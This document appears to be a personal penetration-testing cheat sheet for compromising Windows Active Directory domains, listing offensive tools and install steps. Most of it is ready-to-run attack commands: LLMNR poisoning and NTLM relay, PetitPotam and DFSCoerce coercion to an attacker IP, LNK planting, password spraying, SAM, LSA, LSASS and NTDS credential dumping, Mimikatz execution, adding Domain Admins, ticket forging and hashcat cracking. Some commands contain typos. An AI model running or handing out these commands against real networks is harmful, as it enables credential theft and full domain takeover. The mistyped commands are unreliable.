https://github.com/NotMedic/NetNTLMtoSilverTicket
https://www.n00py.io/2022/10/practical-attacks-against-ntlmv1/
How to pentest like a Gunnaj
Utils
https://github.com/GoVanguard/legion
Installation
https://www.reddit.com/r/Kalilinux/comments/1ann3xo/legion_running_perfectly_then_it_disappears/
https://github.com/lefayjey/linWinPwn
Installation
apt install pipx git
pipx ensurepath
pipx install git+https://github.com/Pennyw0rth/NetExec
git clone https://github.com/lefayjey/linWinPwn
cd linWinPwn; chmod +x linWinPwn.sh
chmod +x install.sh
./install.sh
https://github.com/BloodHoundAD/BloodHound
https://github.com/lgandx/Responder
Installation
apt install netexec
nano ~/.nxc/nxc.conf
[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = <username>
bh_pass = <password>
https://github.com/jfjallid/go-secdump
Installation
sudo apt install golang-go
sudo apt install gccgo-go
git clone https://github.com/jfjallid/go-secdump
cd go-secdump/
go run main.go
go build
https://github.com/Hackplayers/evil-winrm
Installation
gem install evil-winrm
https://github.com/p0dalirius/FindUncommonShares
Installation
git clone https://github.com/p0dalirius/FindUncommonShares
cd FindUncommonShares/
pip install -r requirements.txt
https://github.com/topotam/PetitPotam
https://github.com/Wh04m1001/DFSCoerce
https://github.com/fortra/impacket
https://github.com/skelsec/pypykatz
Installation
pip3 install minidump minikerberos aiowinreg msldap winacl
git clone https://github.com/skelsec/pypykatz.git
cd pypykatz
python3 setup.py install
https://github.com/ly4k/Certipy
https://github.com/hmaverickadams/breach-parse
https://github.com/RUB-NDS/PRET
Installation
git clone https://github.com/RUB-NDS/PRET && cd PRET
python -m pip install colorama pysnmP
Lists
https://zzzteph.github.io/weakpass/
https://crackstation.net/files/crackstation.txt.gz (14.6 GB)
https://download.g0tmi1k.com/wordlists/large/36.4GB-18_in_1.lst.7z (48.4 GB)
Sites
NMAP
sudo nmap -sP -p -oN <output.txt> <IP/mask>
sudo nmap -PN -sC -sV -p- -oN <output.txt> <IP/mask>
sudo nmap -PN --script smb-vuln* -p139,445 -oN <output.txt> <IP/mask>
sudo mncli dev show eth0
nslookup -type=SRV _ldap._tcp.dc._msdcs.<AD_domain>
nltest /dclist:<domainname>
linWinPwn
- Module ad_enum
- RID bruteforce using netexec
- Anonymous enumeration using netexec, enum4linux-ng, ldapdomaindump, ldeep
- Pre2k authentication check on collected list of computers
- Module kerberos
- kerbrute user spray
- ASREPRoast using collected list of users (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Blind Kerberoast
- CVE-2022-33679 exploit
- Module scan_shares
- SMB shares anonymous enumeration on identified servers
- Module vuln_checks
- Enumeration for WebDav, dfscoerce, shadowcoerce and Spooler services on identified servers
- Check for ms17-010, zerologon, petitpotam, nopac, smb-sigining, ntlmv1, runasppl weaknesses
sudo ./linWinPwn.sh -t <Domain_Controller_IP_or_Target_Domain> -M user <output_dir>
-
DNS extraction using adidnsdump
-
Module ad_enum
- BloodHound data collection
- Enumeration using netexec, enum4linux-ng, ldapdomaindump, windapsearch, SilentHound, ldeep
- Users
- MachineAccountQuota
- Password Policy
- Users' descriptions containing "pass"
- ADCS
- Subnets
- GPP Passwords
- Check if ldap-signing is enforced, check for LDAP Relay
- Delegation information
- netexec find accounts with user=pass
- Pre2k authentication check on domain computers
- Extract ADCS information using certipy and certi.py
-
Module kerberos
- kerbrute find accounts with user=pas
- ASREPRoasting (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Kerberoasting (and cracking hashes using john-the-ripper and the rockyou wordlist)
- Targeted Kerberoasting (and cracking hashes using john-the-ripper and the rockyou wordlist)
-
Module scan_shares
- SMB shares enumeration on all domain servers using smbmap and cme's spider_plus
- KeePass files and processes discovery on all domain servers
-
Module vuln_checks
- Enumeration for WebDav, dfscoerce, shadowcoerce and Spooler services on all domain servers
- Check for ms17-010, ms14-068, zerologon, petitpotam, nopac, smb-signing, ntlmv1, runasppl weaknesses
-
Module mssql_enum
- Check mssql privilege escalation paths
sudo ./linWinPwn.sh -t <Domain_Controller_IP_or_Target_Domain> -u <AD_user> -p <AD_password> -o <output_dir>
Responder
responder -I eth0
responder -I eth0 --lm
responder -I eth0 -d
NetExec lnkfile with slinky
NetExec -smb <Target_IP> -u <AD_user> -p <AD_password> -M slinky -o NAME=<filename> SERVER=<attacker_IP>
NetExec -smb <Target_IP> -u <AD_user> -p <AD_password> -M slinky -o NAME=<filename> SERVER=<attacker_IP> CLEANUP=True
NetExec NTLM-relay
NetExec smb <IPs> --gen-relay-list <nosmbsigning.txt>
sudo python3 ntlmrelayx.py -of <outfile.txt> -tf <nosmbsigning.txt> -smb2support
./go-secdump --host <target> -n --relay
[Responder Core]
; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
SNMP = Off
sudo responder -I eth0 -dwv
PetitPotam
python3 PetitPotam.py -d <Domain_Name> -u <AD_user> -p <AD_password> <attacker_IP> <target_IP>
DFSCoerce
python3 dfscoerce.py -d <Domain_Name> -u <AD_user> -p <AD_password> <attacker_IP> <target_IP>
NTLMV1 relaying
NetExec Password spray
netexec smb <Domain_Controller_IP> -u users.txt -p <password> --continue-on-success
NetExec domain authentication
sudo NetExec smb <Domain_Controller_IP> -u <AD_user> -p <AD_password> -H <hash[LM:NT]>
NetExec local authentication
NetExec smb <target_IP> -u <username> -H <hash[LM:NT]> --local-auth
NetExec rdp authentication
NetExec rdp <target_IP> -u <username> -H <hash[LM:NT]> --local-auth
List readable or writable shares
NetExec smb <target_IP> -u <username> -p <password> --shares --filter-shares READ WRITE
List uncommon shares and export as xlsx
python3 ./FindUncommonShares.py -au <username> -ap <password> -ad <AD_domain> -ai <Domain_Controller_IP> --readable --export-xlsx shares
Mount and unmount shares
sudo mount.cifs <//ip/folder> <./folder> -o user=<username>,password=<password>,dom=<AD_domain>
sudo umount <./folder>
grep -i <keyword> *
Domain authentication
NetExec ldap <target_IP> -u <username> -p <password> -H <hash[LM:NT]]> -M adcs
NetExec ldap <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -M masky -o CA=<'ADCS_server_name'>
NetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]]> --sam
./go-secdump --domain <Domain_Controller_IP --host <target_IP> --user <username> ---pass <password> --hash <hash[LM:NT]]> --sam
NetExec smb <target_IP> -u <username> -p <password> -H <hash_NT]> --lsa
./go-secdump --domain <Domain_Controller_IP --host <target_IP> --user <username> ---pass <password> --hash <hash[LM:NT]]> --lsa
Local authentication
NetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --local-auth --sam
./go-secdump --domain <Domain_Controller_IP --host <target_IP> --user <username> ---pass <password> --hash <hash[LM:NT]]> --sam --local
NetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --local-auth --lsa
./go-secdump --domain <Domain_Controller_IP --host <target_IP> --user <username> ---pass <password> --hash <hash[LM:NT]]> --lsa --local
NetExec Dump lsass with hash_spider to recursively using BloodHound to find local admins path (adminTo)
NetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --local-auth -M hash_spider
rundll32.exe keymgr.dll KRShowKeyMgr
NetExec dump with ReadLAPSPassword rights
NetExec ldap <AD_domain> -u <username> -p <password> -H <hash[LM:NT]> -M laps
NetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -M laps --sam
NetExec smb <target_IP> -u <username> -p <password> -H <hash[LM:NT]> --M laps --lsa
Run Mimikatz from impackets smb share
impacket-smbserver.py <shareName> <sharePath>
\\<target_IP>\<shareName>\mimikatz.exe "privilege::debug: sekurlsa::logonpasswords exit" > \\<target_IP>\<shareName>\output.txt
linWinPwn
- All of the "Standard User" checks
- Module pwd_dump
- LAPS and gMSA dump
- secretsdump on all domain servers
- NTDS dump using impacket, netexec and certsync
- Dump lsass on all domain servers using: procdump, lsassy, nanodump, handlekatz, masky
- Extract backup keys using DonPAPI, HEKATOMB
sudo ./linWinPwn.sh -t <Domain_Controller_IP> -d <AD_domain> -u <AD_user> -p <AD_password> -H <hash[LM:NT]> -K <kerbticket[./krb5cc_ticket]> -o <output_dir>
Examine lsass dump with pypykatz
pypykatz lsa minidump lsass.DMP
NetExec
wmiexec
executes commands via WMIatexec
executes commands by scheduling a task with windows task schedulersmbexec
executes commands by creating and running a service
NetExec <protocol> <target_IP> -u <username> -p <password> -H <hash[LM:NT]]> -x <command>
NetExec <protocol> <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -X <command>
NetExec <protocol> <target_IP> -u <username> -p <password> -H <hash[LM:NT]> -M schtask_as -o USER=<logged-on-user> CMD=<cmd-command>
Evil-WinRM
evil-winrm -i <target_IP> -u <username> -p <password> -H <hash[LM:NT]>
Command to add a new Domain Admin
net user <username> <password> /add /domain
net group "Domain Admins" <username> /add /domain
powershell.exe \"Invoke-Command -ComputerName DC01 -ScriptBlock {Add-ADGroupMember -Identity 'Domain Admins' -Members USER.NAME}\"
NetExec
Tickets
wmic useraccount where name="USER" get sid
python3 ticketer.py -nthash <nthash> -domain-sid <domain-sid> -domain <AD_domain> -dc-ip <Domain_Controller_IP> -spn <service>/<AD_domain>l <user>
python3 ticketer.py -nthash <nthash> -domain-sid <domain-sid> -domain <AD_domain> -dc-ip <Domain_Controller_IP> <user>
export KRB5CCNAME=<TGS_ccache_file>
klist
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
PRET
nmap -p 9100 <IP/mask>
http://hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
pret.py target {ps,pjl,pcl}
Attack modes
hashcat64.exe -m <hash_type> -a 0 <hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m <hash_type> -a 1 <hashes.txt> <passlist1.txt> <passlist2.txt> -o cracked.txt
hashcat64.exe -m <hash_type> -a 3 <hashes.txt> ?a?a?a?a?a?a?a?a --increment -o cracked.txt
hashcat64.exe -m <hash_type> -a 6 <hashes.txt> <passlist.txt> ?a?a?a?a?a?a?a?a --increment -o cracked.txt
hashcat64.exe -m <hash_type> -a 7 <hashes.txt> ?a?a?a?a?a?a?a?a --increment <passlist.txt> -o cracked.txt
- ?l = abcdefghijklmnopqrstuvwxyz
- ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
- ?d = 0123456789
- ?h = 0123456789abcdef
- ?H = 0123456789ABCDEF
- ?s = «space»!"#$%&'()*+,-./:;<=>?@[]^_`{|}~
- ?a = ?l?u?d?s
- ?b = 0x00 - 0xff
- --increment-min
- --increment-max
Hash types
hashcat64.exe -m 3000 -a 3 <LM-hashes.txt> -o cracked.txt
hashcat64.exe -m 1000 -a 3 <NTLM-hashes.txt> -o cracked.txt
hashcat64.exe -m 5500 -a 3 <NTLMv1-hashes.txt> -o cracked.txt
hashcat64.exe -m 5600 -a 0 <NTLMv2-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 18200 -a 0 <asrep-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 13100 -a 0 <krb5tgs-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 19600 -a 0 <krb5tgsaes128-hashes.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 19700 -a 0 <krb5tgsaes256.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 19800 -a 0 <krb5tetype17.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 19900 -a 0 <krb5tetype18.txt> <passlist.txt> -o cracked.txt
hashcat64.exe -m 2100 -a 0 <mscache2-hashes.txt> <passlist.txt> -o cracked.txt